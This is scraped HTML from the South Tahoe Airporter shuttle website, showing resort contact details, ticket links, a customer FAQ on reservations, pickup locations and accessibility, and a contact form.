class="widget_contact_info mk-contactinfo-shortcode a_margin-bottom-20" itemscope="itemscope" itemtype="https://schema.org/Person" > <ul> <li><i><svg class="mk-svg-icon" data-name="mk-icon-home" data-cacheid="icon-5cdd849f88b82" style=" height:16px; width: 14.8571428571px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1408 992v480q0 26-19 45t-45 19h-384v-384h-256v384h-384q-26 0-45-19t-19-45v-480q0-1 .5-3t.5-3l575-474 575 474q1 2 1 6zm223-69l-62 74q-8 9-21 11h-3q-13 0-21-7l-692-577-692 577q-12 8-24 7-13-2-21-11l-62-74q-8-10-7-23.5t11-21.5l719-599q32-26 76-26t76 26l244 204v-195q0-14 9-23t23-9h192q14 0 23 9t9 23v408l219 182q10 8 11 21.5t-7 23.5z"/></svg></i><span itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">15 US-50, Stateline, NV 89449</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-phone" data-cacheid="icon-5cdd849f88d18" style=" height:16px; width: 12.5714285714px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1408 1792"><path d="M1408 1240q0 27-10 70.5t-21 68.5q-21 50-122 106-94 51-186 51-27 0-52.5-3.5t-57.5-12.5-47.5-14.5-55.5-20.5-49-18q-98-35-175-83-128-79-264.5-215.5t-215.5-264.5q-48-77-83-175-3-9-18-49t-20.5-55.5-14.5-47.5-12.5-57.5-3.5-52.5q0-92 51-186 56-101 106-122 25-11 68.5-21t70.5-10q14 0 21 3 18 6 53 76 11 19 30 54t35 63.5 31 53.5q3 4 17.5 25t21.5 35.5 7 28.5q0 20-28.5 50t-62 55-62 53-28.5 46q0 9 5 22.5t8.5 20.5 14 24 11.5 19q76 137 174 235t235 174q2 1 19 11.5t24 14 20.5 8.5 22.5 5q18 0 46-28.5t53-62 55-62 50-28.5q14 0 28.5 7t35.5 21.5 25 17.5q25 15 53.5 31t63.5 35 54 30q70 35 76 53 3 7 3 21z"/></svg></i><span>(775) 588-6611</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-globe" data-cacheid="icon-5cdd849f88e84" style=" height:16px; width: 13.7142857143px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1536 1792"><path d="M768 128q209 0 385.5 103t279.5 279.5 103 385.5-103 385.5-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103zm274 521q-2 1-9.5 9.5t-13.5 9.5q2 0 4.5-5t5-11 3.5-7q6-7 22-15 14-6 52-12 34-8 51 11-2-2 9.5-13t14.5-12q3-2 15-4.5t15-7.5l2-22q-12 1-17.5-7t-6.5-21q0 2-6 8 0-7-4.5-8t-11.5 1-9 1q-10-3-15-7.5t-8-16.5-4-15q-2-5-9.5-10.5t-9.5-10.5q-1-2-2.5-5.5t-3-6.5-4-5.5-5.5-2.5-7 5-7.5 10-4.5 5q-3-2-6-1.5t-4.5 1-4.5 3-5 3.5q-3 2-8.5 3t-8.5 2q15-5-1-11-10-4-16-3 9-4 7.5-12t-8.5-14h5q-1-4-8.5-8.5t-17.5-8.5-13-6q-8-5-34-9.5t-33-.5q-5 6-4.5 10.5t4 14 3.5 12.5q1 6-5.5 13t-6.5 12q0 7 14 15.5t10 21.5q-3 8-16 16t-16 12q-5 8-1.5 18.5t10.5 16.5q2 2 1.5 4t-3.5 4.5-5.5 4-6.5 3.5l-3 2q-11 5-20.5-6t-13.5-26q-7-25-16-30-23-8-29 1-5-13-41-26-25-9-58-4 6-1 0-15-7-15-19-12 3-6 4-17.5t1-13.5q3-13 12-23 1-1 7-8.5t9.5-13.5.5-6q35 4 50-11 5-5 11.5-17t10.5-17q9-6 14-5.5t14.5 5.5 14.5 5q14 1 15.5-11t-7.5-20q12 1 3-17-5-7-8-9-12-4-27 5-8 4 2 8-1-1-9.5 10.5t-16.5 17.5-16-5q-1-1-5.5-13.5t-9.5-13.5q-8 0-16 15 3-8-11-15t-24-8q19-12-8-27-7-4-20.5-5t-19.5 4q-5 7-5.5 11.5t5 8 10.5 5.5 11.5 4 8.5 3q14 10 8 14-2 1-8.5 3.5t-11.5 4.5-6 4q-3 4 0 14t-2 14q-5-5-9-17.5t-7-16.5q7 9-25 6l-10-1q-4 0-16 2t-20.5 1-13.5-8q-4-8 0-20 1-4 4-2-4-3-11-9.5t-10-8.5q-46 15-94 41 6 1 12-1 5-2 13-6.5t10-5.5q34-14 42-7l5-5q14 16 20 25-7-4-30-1-20 6-22 12 7 12 5 18-4-3-11.5-10t-14.5-11-15-5q-16 0-22 1-146 80-235 222 7 7 12 8 4 1 5 9t2.5 11 11.5-3q9 8 3 19 1-1 44 27 19 17 21 21 3 11-10 18-1-2-9-9t-9-4q-3 5 .5 18.5t10.5 12.5q-7 0-9.5 16t-2.5 35.5-1 23.5l2 1q-3 12 5.5 34.5t21.5 19.5q-13 3 20 43 6 8 8 9 3 2 12 7.5t15 10 10 10.5q4 5 10 22.5t14 23.5q-2 6 9.5 20t10.5 23q-1 0-2.5 1t-2.5 1q3 7 15.5 14t15.5 13q1 3 2 10t3 11 8 2q2-20-24-62-15-25-17-29-3-5-5.5-15.5t-4.5-14.5q2 0 6 1.5t8.5 3.5 7.5 4 2 3q-3 7 2 17.5t12 18.5 17 19 12 13q6 6 14 19.5t0 13.5q9 0 20 10t17 20q5 8 8 26t5 24q2 7 8.5 13.5t12.5 9.5l16 8 13 7q5 2 18.5 10.5t21.5 11.5q10 4 16 4t14.5-2.5 13.5-3.5q15-2 29 15t21 21q36 19 55 11-2 1 .5 7.5t8 15.5 9 14.5 5.5 8.5q5 6 18 15t18 15q6-4 7-9-3 8 7 20t18 10q14-3 14-32-31 15-49-18 0-1-2.5-5.5t-4-8.5-2.5-8.5 0-7.5 5-3q9 0 10-3.5t-2-12.5-4-13q-1-8-11-20t-12-15q-5 9-16 8t-16-9q0 1-1.5 5.5t-1.5 6.5q-13 0-15-1 1-3 2.5-17.5t3.5-22.5q1-4 5.5-12t7.5-14.5 4-12.5-4.5-9.5-17.5-2.5q-19 1-26 20-1 3-3 10.5t-5 11.5-9 7q-7 3-24 2t-24-5q-13-8-22.5-29t-9.5-37q0-10 2.5-26.5t3-25-5.5-24.5q3-2 9-9.5t10-10.5q2-1 4.5-1.5t4.5 0 4-1.5 3-6q-1-1-4-3-3-3-4-3 7 3 28.5-1.5t27.5 1.5q15 11 22-2 0-1-2.5-9.5t-.5-13.5q5 27 29 9 3 3 15.5 5t17.5 5q3 2 7 5.5t5.5 4.5 5-.5 8.5-6.5q10 14 12 24 11 40 19 44 7 3 11 2t4.5-9.5 0-14-1.5-12.5l-1-8v-18l-1-8q-15-3-18.5-12t1.5-18.5 15-18.5q1-1 8-3.5t15.5-6.5 12.5-8q21-19 15-35 7 0 11-9-1 0-5-3t-7.5-5-4.5-2q9-5 2-16 5-3 7.5-11t7.5-10q9 12 21 2 7-8 1-16 5-7 20.5-10.5t18.5-9.5q7 2 8-2t1-12 3-12q4-5 15-9t13-5l17-11q3-4 0-4 18 2 31-11 10-11-6-20 3-6-3-9.5t-15-5.5q3-1 11.5-.5t10.5-1.5q15-10-7-16-17-5-43 12zm-163 877q206-36 351-189-3-3-12.5-4.5t-12.5-3.5q-18-7-24-8 1-7-2.5-13t-8-9-12.5-8-11-7q-2-2-7-6t-7-5.5-7.5-4.5-8.5-2-10 1l-3 1q-3 1-5.5 2.5t-5.5 3-4 3 0 2.5q-21-17-36-22-5-1-11-5.5t-10.5-7-10-1.5-11.5 7q-5 5-6 15t-2 13q-7-5 0-17.5t2-18.5q-3-6-10.5-4.5t-12 4.5-11.5 8.5-9 6.5-8.5 5.5-8.5 7.5q-3 4-6 12t-5 11q-2-4-11.5-6.5t-9.5-5.5q2 10 4 35t5 38q7 31-12 48-27 25-29 40-4 22 12 26 0 7-8 20.5t-7 21.5q0 6 2 16z"/></svg></i><span><a href="https://www.caesars.com/harrahs-tahoe" itemprop="url">https://www.caesars.com/harrahs-tahoe</a></span></li> </ul> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-44" class="mk-padding-divider clearfix"></div> <div id="box-icon-45" style="margin-bottom:30px;" class=" simple_ultimate-style mk-box-icon clearfix"><div class="top-side rounded-circle"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b"><i style="color:#315e37;border-color:#315e37;" class=" medium mk-main-ico"><svg class="mk-svg-icon" data-name="mk-moon-tag-5" data-cacheid="icon-5cdd849f898a9" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M448 416h-149.49l-208-208 149.49-149.49 208 208v149.49zm64 64v-240l-272-272-240 240 272 272h240zm-192-144a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0z" transform="scale(1 -1) translate(0 -480)"/></svg></i></a><div class="box-detail-wrapper medium-size"><h4 style="font-size:18px;font-weight:bold;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b">Buy A Ticket Now</a></h4></div><div class="clearboth"></div></div><div class="clearboth"></div></div></div></div></div> </div></div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-46" class="mk-page-section self-hosted full-width-46 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="mk-image align-left simple-frame inside-image " style="margin-bottom:10px"><div class="mk-image-holder" style="max-width: 1280px;"><div class="mk-image-inner "><img class="lightbox-false" alt="" title="" width="1280" height="720" src="http://162.144.216.172/~southtahoeairpor/wp-content/uploads/2016/06/MontBue.jpg" /></div></div><div class="clearboth"></div></div></div></div></div> </div> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-47" class="mk-padding-divider clearfix"></div> <h3 id="mk-title-box-48" class="mk-title-box clearfix "> <span> <p>MontBleu Resort</p> </span> </h3> <div class="widget_contact_info mk-contactinfo-shortcode a_margin-bottom-20" itemscope="itemscope" itemtype="https://schema.org/Person" > <ul> <li><i><svg class="mk-svg-icon" data-name="mk-icon-home" data-cacheid="icon-5cdd849f8c8a5" style=" height:16px; width: 14.8571428571px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1408 992v480q0 26-19 45t-45 19h-384v-384h-256v384h-384q-26 0-45-19t-19-45v-480q0-1 .5-3t.5-3l575-474 575 474q1 2 1 6zm223-69l-62 74q-8 9-21 11h-3q-13 0-21-7l-692-577-692 577q-12 8-24 7-13-2-21-11l-62-74q-8-10-7-23.5t11-21.5l719-599q32-26 76-26t76 26l244 204v-195q0-14 9-23t23-9h192q14 0 23 9t9 23v408l219 182q10 8 11 21.5t-7 23.5z"/></svg></i><span itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">55 US-50, Lake Tahoe, NV 89449</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-phone" data-cacheid="icon-5cdd849f8ca06" style=" height:16px; width: 12.5714285714px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1408 1792"><path d="M1408 1240q0 27-10 70.5t-21 68.5q-21 50-122 106-94 51-186 51-27 0-52.5-3.5t-57.5-12.5-47.5-14.5-55.5-20.5-49-18q-98-35-175-83-128-79-264.5-215.5t-215.5-264.5q-48-77-83-175-3-9-18-49t-20.5-55.5-14.5-47.5-12.5-57.5-3.5-52.5q0-92 51-186 56-101 106-122 25-11 68.5-21t70.5-10q14 0 21 3 18 6 53 76 11 19 30 54t35 63.5 31 53.5q3 4 17.5 25t21.5 35.5 7 28.5q0 20-28.5 50t-62 55-62 53-28.5 46q0 9 5 22.5t8.5 20.5 14 24 11.5 19q76 137 174 235t235 174q2 1 19 11.5t24 14 20.5 8.5 22.5 5q18 0 46-28.5t53-62 55-62 50-28.5q14 0 28.5 7t35.5 21.5 25 17.5q25 15 53.5 31t63.5 35 54 30q70 35 76 53 3 7 3 21z"/></svg></i><span>(775) 588-3515</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-globe" data-cacheid="icon-5cdd849f8cb8b" style=" height:16px; width: 13.7142857143px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1536 1792"><path d="M768 128q209 0 385.5 103t279.5 279.5 103 385.5-103 385.5-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103zm274 521q-2 1-9.5 9.5t-13.5 9.5q2 0 4.5-5t5-11 3.5-7q6-7 22-15 14-6 52-12 34-8 51 11-2-2 9.5-13t14.5-12q3-2 15-4.5t15-7.5l2-22q-12 1-17.5-7t-6.5-21q0 2-6 8 0-7-4.5-8t-11.5 1-9 1q-10-3-15-7.5t-8-16.5-4-15q-2-5-9.5-10.5t-9.5-10.5q-1-2-2.5-5.5t-3-6.5-4-5.5-5.5-2.5-7 5-7.5 10-4.5 5q-3-2-6-1.5t-4.5 1-4.5 3-5 3.5q-3 2-8.5 3t-8.5 2q15-5-1-11-10-4-16-3 9-4 7.5-12t-8.5-14h5q-1-4-8.5-8.5t-17.5-8.5-13-6q-8-5-34-9.5t-33-.5q-5 6-4.5 10.5t4 14 3.5 12.5q1 6-5.5 13t-6.5 12q0 7 14 15.5t10 21.5q-3 8-16 16t-16 12q-5 8-1.5 18.5t10.5 16.5q2 2 1.5 4t-3.5 4.5-5.5 4-6.5 3.5l-3 2q-11 5-20.5-6t-13.5-26q-7-25-16-30-23-8-29 1-5-13-41-26-25-9-58-4 6-1 0-15-7-15-19-12 3-6 4-17.5t1-13.5q3-13 12-23 1-1 7-8.5t9.5-13.5.5-6q35 4 50-11 5-5 11.5-17t10.5-17q9-6 14-5.5t14.5 5.5 14.5 5q14 1 15.5-11t-7.5-20q12 1 3-17-5-7-8-9-12-4-27 5-8 4 2 8-1-1-9.5 10.5t-16.5 17.5-16-5q-1-1-5.5-13.5t-9.5-13.5q-8 0-16 15 3-8-11-15t-24-8q19-12-8-27-7-4-20.5-5t-19.5 4q-5 7-5.5 11.5t5 8 10.5 5.5 11.5 4 8.5 3q14 10 8 14-2 1-8.5 3.5t-11.5 4.5-6 4q-3 4 0 14t-2 14q-5-5-9-17.5t-7-16.5q7 9-25 6l-10-1q-4 0-16 2t-20.5 1-13.5-8q-4-8 0-20 1-4 4-2-4-3-11-9.5t-10-8.5q-46 15-94 41 6 1 12-1 5-2 13-6.5t10-5.5q34-14 42-7l5-5q14 16 20 25-7-4-30-1-20 6-22 12 7 12 5 18-4-3-11.5-10t-14.5-11-15-5q-16 0-22 1-146 80-235 222 7 7 12 8 4 1 5 9t2.5 11 11.5-3q9 8 3 19 1-1 44 27 19 17 21 21 3 11-10 18-1-2-9-9t-9-4q-3 5 .5 18.5t10.5 12.5q-7 0-9.5 16t-2.5 35.5-1 23.5l2 1q-3 12 5.5 34.5t21.5 19.5q-13 3 20 43 6 8 8 9 3 2 12 7.5t15 10 10 10.5q4 5 10 22.5t14 23.5q-2 6 9.5 20t10.5 23q-1 0-2.5 1t-2.5 1q3 7 15.5 14t15.5 13q1 3 2 10t3 11 8 2q2-20-24-62-15-25-17-29-3-5-5.5-15.5t-4.5-14.5q2 0 6 1.5t8.5 3.5 7.5 4 2 3q-3 7 2 17.5t12 18.5 17 19 12 13q6 6 14 19.5t0 13.5q9 0 20 10t17 20q5 8 8 26t5 24q2 7 8.5 13.5t12.5 9.5l16 8 13 7q5 2 18.5 10.5t21.5 11.5q10 4 16 4t14.5-2.5 13.5-3.5q15-2 29 15t21 21q36 19 55 11-2 1 .5 7.5t8 15.5 9 14.5 5.5 8.5q5 6 18 15t18 15q6-4 7-9-3 8 7 20t18 10q14-3 14-32-31 15-49-18 0-1-2.5-5.5t-4-8.5-2.5-8.5 0-7.5 5-3q9 0 10-3.5t-2-12.5-4-13q-1-8-11-20t-12-15q-5 9-16 8t-16-9q0 1-1.5 5.5t-1.5 6.5q-13 0-15-1 1-3 2.5-17.5t3.5-22.5q1-4 5.5-12t7.5-14.5 4-12.5-4.5-9.5-17.5-2.5q-19 1-26 20-1 3-3 10.5t-5 11.5-9 7q-7 3-24 2t-24-5q-13-8-22.5-29t-9.5-37q0-10 2.5-26.5t3-25-5.5-24.5q3-2 9-9.5t10-10.5q2-1 4.5-1.5t4.5 0 4-1.5 3-6q-1-1-4-3-3-3-4-3 7 3 28.5-1.5t27.5 1.5q15 11 22-2 0-1-2.5-9.5t-.5-13.5q5 27 29 9 3 3 15.5 5t17.5 5q3 2 7 5.5t5.5 4.5 5-.5 8.5-6.5q10 14 12 24 11 40 19 44 7 3 11 2t4.5-9.5 0-14-1.5-12.5l-1-8v-18l-1-8q-15-3-18.5-12t1.5-18.5 15-18.5q1-1 8-3.5t15.5-6.5 12.5-8q21-19 15-35 7 0 11-9-1 0-5-3t-7.5-5-4.5-2q9-5 2-16 5-3 7.5-11t7.5-10q9 12 21 2 7-8 1-16 5-7 20.5-10.5t18.5-9.5q7 2 8-2t1-12 3-12q4-5 15-9t13-5l17-11q3-4 0-4 18 2 31-11 10-11-6-20 3-6-3-9.5t-15-5.5q3-1 11.5-.5t10.5-1.5q15-10-7-16-17-5-43 12zm-163 877q206-36 351-189-3-3-12.5-4.5t-12.5-3.5q-18-7-24-8 1-7-2.5-13t-8-9-12.5-8-11-7q-2-2-7-6t-7-5.5-7.5-4.5-8.5-2-10 1l-3 1q-3 1-5.5 2.5t-5.5 3-4 3 0 2.5q-21-17-36-22-5-1-11-5.5t-10.5-7-10-1.5-11.5 7q-5 5-6 15t-2 13q-7-5 0-17.5t2-18.5q-3-6-10.5-4.5t-12 4.5-11.5 8.5-9 6.5-8.5 5.5-8.5 7.5q-3 4-6 12t-5 11q-2-4-11.5-6.5t-9.5-5.5q2 10 4 35t5 38q7 31-12 48-27 25-29 40-4 22 12 26 0 7-8 20.5t-7 21.5q0 6 2 16z"/></svg></i><span><a href="http://www.montbleuresort.com/" itemprop="url">http://www.montbleuresort.com/</a></span></li> </ul> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-49" class="mk-padding-divider clearfix"></div> <div id="box-icon-50" style="margin-bottom:30px;" class=" simple_ultimate-style mk-box-icon clearfix"><div class="top-side rounded-circle"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b"><i style="color:#315e37;border-color:#315e37;" class=" medium mk-main-ico"><svg class="mk-svg-icon" data-name="mk-moon-tag-5" data-cacheid="icon-5cdd849f8d4c3" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M448 416h-149.49l-208-208 149.49-149.49 208 208v149.49zm64 64v-240l-272-272-240 240 272 272h240zm-192-144a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0z" transform="scale(1 -1) translate(0 -480)"/></svg></i></a><div class="box-detail-wrapper medium-size"><h4 style="font-size:18px;font-weight:bold;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b">Buy A Ticket Now</a></h4></div><div class="clearboth"></div></div><div class="clearboth"></div></div></div></div></div> </div></div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-51" class="mk-page-section self-hosted full-width-51 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div class="mk-moving-image align-center "> <img class="mk-floating-vertical" alt="" title="" src="http://162.144.216.172/~southtahoeairpor/wp-content/uploads/2016/06/gem.png" /> </div> <div class="clearboth"></div> <div id="padding-52" class="mk-padding-divider clearfix"></div> <div id="padding-53" class="mk-padding-divider clearfix"></div> </div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-54" class="mk-page-section self-hosted full-width-54 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-8 wpb_column column_container _ height-full"> <div id="padding-55" class="mk-padding-divider clearfix"></div> <h2 id="fancy-title-56" class="mk-fancy-title simple-style color-single"> <span> <p>The best way to Lake Tahoe, book tickets online now.</p> </span> </h2> <div class="clearboth"></div> </div> <div style="" class="vc_col-sm-4 wpb_column column_container _ height-full"> <div id="mk-button-57" class="mk-button-container _ relative inline left "> <a href="http://amadorstagelines.com/new-get-a-quote/" target="_self" class="mk-button js-smooth-scroll mk-button--dimension-outline mk-button--size-large mk-button--corner-pointed skin-light _ relative text-center font-weight-700 no-backface letter-spacing-2 inline"> <span class="mk-button--text"> CLICK HERE </span> </a> </div></div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-58" class="mk-page-section self-hosted full-width-58 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div id="padding-59" class="mk-padding-divider clearfix"></div> <h2 id="fancy-title-60" class="mk-fancy-title simple-style color-single"> <span> <p>FAQ&#8217;S</p> </span> </h2> <div class="clearboth"></div> <div id="padding-61" class="mk-padding-divider clearfix"></div> <div id="text-block-62" class="mk-text-block "> <p>Q: Do I need to make a reservation?</p> <p>A: Reservations are required to guarantee your seat on the shuttle for the specified time. Walk-ons are welcome based on seat availability.</p> <p>Q: How much time should I allow from my arrival time to make the shuttle?</p> <p>A: While you should be able to make it from your terminal to the baggage claim area in ten minutes or less, we recommend at least a half hour allowance if you have checked luggage.</p> <p>Q: How early should I schedule the shuttle back to the airport?</p> <p>A: We recommend taking a shuttle that is scheduled to get you to the airport at least an hour and a half prior to your departure time. In the event of inclement weather (especially in winter), we recommend erring on the side of caution as delays and longer travel time are possible.</p> <p>Q: What if my flight is delayed?</p> <p>A: While <span class="taskRHSText"><span class="tipped" data-tipped-options="ajax:{cache:false},skin:'twMenu',showDelay:700,offset:{y:(document.all || !!window.MSStream)?-15:-12},hook:'topmiddle',containment:false"><span id="taskName3931083" class="taskDetailsName" data-bind="css:{ 'completed':status() === 'completed' },attr:{ id:'taskName' + id }"><span data-bind="html:nameWithLinks()">South Tahoe Airporter</span></span></span></span> does not issue refunds for cancellation, we will change your reservation to the next available shuttle in the case of flight delays.</p> <p>Q: I&#8217;m staying in South Lake Tahoe, but not at one of the resorts listed. Can I still use your shuttle?<br /> A: Yes. While <span class="taskRHSText"><span class="tipped" data-tipped-options="ajax:{cache:false},skin:'twMenu',showDelay:700,offset:{y:(document.all || !!window.MSStream)?-15:-12},hook:'topmiddle',containment:false"><span id="taskName3931083" class="taskDetailsName" data-bind="css:{ 'completed':status() === 'completed' },attr:{ id:'taskName' + id }"><span data-bind="html:nameWithLinks()">South Tahoe Airporter</span></span></span></span> will only stop at the six listed properties (Lakeside Inn, Horizon, Harvey&#8217;s, Lake Tahoe Resort Hotel, Harrah&#8217;s and Mt Bleu Resort), you may use the South shore transit system to connect to these resorts. For route and schedule information, please visit: http://www.tahoetransportation.org/transit/south-shore-services</p> <p>Q: Are the transactions I place on your Web site secure?</p> <p>A: Yes. The entire South Tahoe Airporter ticketing process runs on a 256 bit secure server.</p> <p>Q: I will require wheelchair assistance, can you accommodate?</p> <p>A: To accommodate wheelchair requests, we require booking 48 hours before departure.</p> <p>Q: Where can I purchase tickets?</p> <p>A: Reservations can be booked online using our convenient self-serve ticketing system. You may also purchase tickets at our airport office located across from Carousel 5 in the baggage claim area or at the front desk or concierge at any of the six participating resorts.</p> <p>Q: Where will you be picking me up from?</p> <p>A:Reno-Tahoe Airport: South Tahoe Airporter desk is by baggage claim 5.</p> <p>Lakeside: Side entrance</p> <p>Hard Rock: Front entrance, near valet.</p> <p>Harvey&#8217;s: Bus depot behind Starbucks.</p> <p>LTRH: Valet</p> <p>Harrah&#8217;s: Front entrance, near valet.</p> <p>Montbleu: Side entrance, near parking lot.</p> <p>Q: What will the bus look like that is picking us up?</p> <p>A: It will be an Amador Stage Line Bus, Temsa Bus, or Sprinter Van.</p> <div class="clearboth"></div> </div> </div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-63" class="mk-page-section self-hosted full-width-63 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> <div class="mk-section-preloader js-el" data-mk-component="Preloader"> <div class="mk-section-preloader__icon"></div> </div> <div class="background-layer-holder"> <div id="background-layer--63" class="background-layer mk-background-stretch none-blend-effect js-el" data-mk-component="Parallax" data-parallax-config='{"speed" : 0.2 }' data-mk-img-set='{"landscape":{"desktop":"http:\/\/southtahoeairporter.com\/wp-content\/uploads\/2016\/06\/contact-bg1.jpg","tablet":"http:\/\/southtahoeairporter.com\/wp-content\/uploads\/2016\/06\/contact-bg1-1024x768.jpg","mobile":"http:\/\/southtahoeairporter.com\/wp-content\/uploads\/2016\/06\/contact-bg1-736x414.jpg"}}' > </div> </div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div class="mk-moving-image align-center "> <img class="mk-floating-vertical" alt="" title="" src="http://162.144.216.172/~southtahoeairpor/wp-content/uploads/2016/06/mail.png" /> </div> <div class="clearboth"></div> <div id="padding-64" class="mk-padding-divider clearfix"></div> <h2 id="fancy-title-65" class="mk-fancy-title simple-style color-single"> <span> <p>Booking Questions?</p> </span> </h2> <div class="clearboth"></div> <h2 id="fancy-title-66" class="mk-fancy-title simple-style color-single"> <span> <p>We are here to help with your Lake Tahoe travel questions!</p> </span> </h2> <div class="clearboth"></div> <div id="padding-67" class="mk-padding-divider clearfix"></div> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="mk-contact-form-wrapper s_contact modern-style s_modern contact-light light "> <form id="mk-contact-form-68" class="mk-contact-form clearfix" method="post" novalidate="novalidate" enctype="multipart/form-data"> <div class="mk-form-row "> <input placeholder="Your Name" type="text" required="required" name="contact_name" class="text-input s_txt-input" value="" tabindex="408" /> </div> <div class="mk-form-row "> <input placeholder="Your Email" class="text-input s_txt-input" type="email" required="required" name="contact_email" value="" tabindex="409" /> </div><div class="mk-form-row"> <textarea required="required" placeholder="Your Message" class="mk-textarea s_txt-input" name="contact_content" tabindex="410"></textarea> </div><div class="mk-form-row"> <input placeholder="Enter Captcha" data-placeholder="Enter Captcha" class="captcha-form text-input s_txt-input full" type="text" name="captcha" required="required" autocomplete="off" tabindex="411" /> <div class="captcha-block"> <span class="captcha-image-holder"></span> </div> <a href="#" class="captcha-change-image">Not readable? Change text.</a> </div> <div class="mk-form-row" style="float:left;"> <button class="mk-progress-button mk-button contact-form-button mk-button--dimension-outline mk-button--size-medium skin-light" data-style="move-up" tabindex="412"> <span class="mk-progress-button-content"> Submit </span> <span class="mk-progress"> <span class="mk-progress-inner"></span> </span> <span class="state-success"> <svg class="mk-svg-icon" data-name="mk-moon-checkmark" data-cacheid="icon-5cdd849f950f2" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M432 64l-240 240-112-112-80 80 192 192 320-320z"/></svg> </span> <span class="state-error"> <svg class="mk-svg-icon" data-name="mk-moon-close" data-cacheid="icon-5cdd849f95651" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M507.331 411.33l-.006-.005-155.322-155.325 155.322-155.325.006-.005c1.672-1.673 2.881-3.627 3.656-5.708 2.123-5.688.912-12.341-3.662-16.915l-73.373-73.373c-4.574-4.573-11.225-5.783-16.914-3.66-2.08.775-4.035 1.984-5.709 3.655l-.004.005-155.324 155.326-155.324-155.325-.005-.005c-1.673-1.671-3.627-2.88-5.707-3.655-5.69-2.124-12.341-.913-16.915 3.66l-73.374 73.374c-4.574 4.574-5.784 11.226-3.661 16.914.776 2.08 1.985 4.036 3.656 5.708l.005.005 155.325 